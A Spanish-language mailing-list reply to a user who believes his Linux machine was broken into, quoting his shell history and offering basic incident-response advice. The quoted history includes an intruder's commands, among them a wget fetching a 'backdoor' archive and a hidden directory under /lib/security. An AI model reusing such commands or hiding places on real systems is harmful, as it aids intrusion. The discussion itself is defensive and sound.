Re: Fui atacado]
==> nada de fecha 18 de febrero en el syslog. Luego hice un history y me
==> aparecio esto que por su puesto yo no lo hice(màs raro aun):
==>
==> 484 cat /etc/issue
==> 485 ps
==> 486 bash
==> 487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
==> 488 netstat -a
==> 489 cd /lib/security/.config/bin
==> 490 cd /lib/security/.config
==> 491 dir
==> 492 cd ssh
==> 493 dir
==> 494 cd ..
==> 495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
==> /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==> 497 wget
==> http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==> 498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz
==>
==> Esto paquete porsuesto no los baje.
Parece que se han colado en tu ordenador y se han bajado un backdoor de esos (y no ha borrado el historial, animalito). Pues yo me iría para empezar a la pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y conectate a internet lo menos posible, y pon un firewall que bloquee practicamente todo menos lo necesario. Mira los servicios abiertos a internet y el kernel, a ver que vulnerabilidades tienen. También te puedes bajar el manual análisis forense en linux o algo así que esta en es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista hackindex (busca en google la web).
==>
==> Ah hago un ps y no sale nada, me dice esto:
==> Violación de segmento
Vaya, eso igual lo ha echo el troyano.
No soy ningún experto, asi que no puedo ayudar más, saludos.
==> Cual es la inseguridad que tengo?
==>
==> Gracias y saludos......
==>
==> --
==> Federico Contreras
==> T.S.U. en Informática
==> U.D.O.
==>
--
"No hay nada peor que ser vulgar"
sotanez@jabber.cn
Reply to: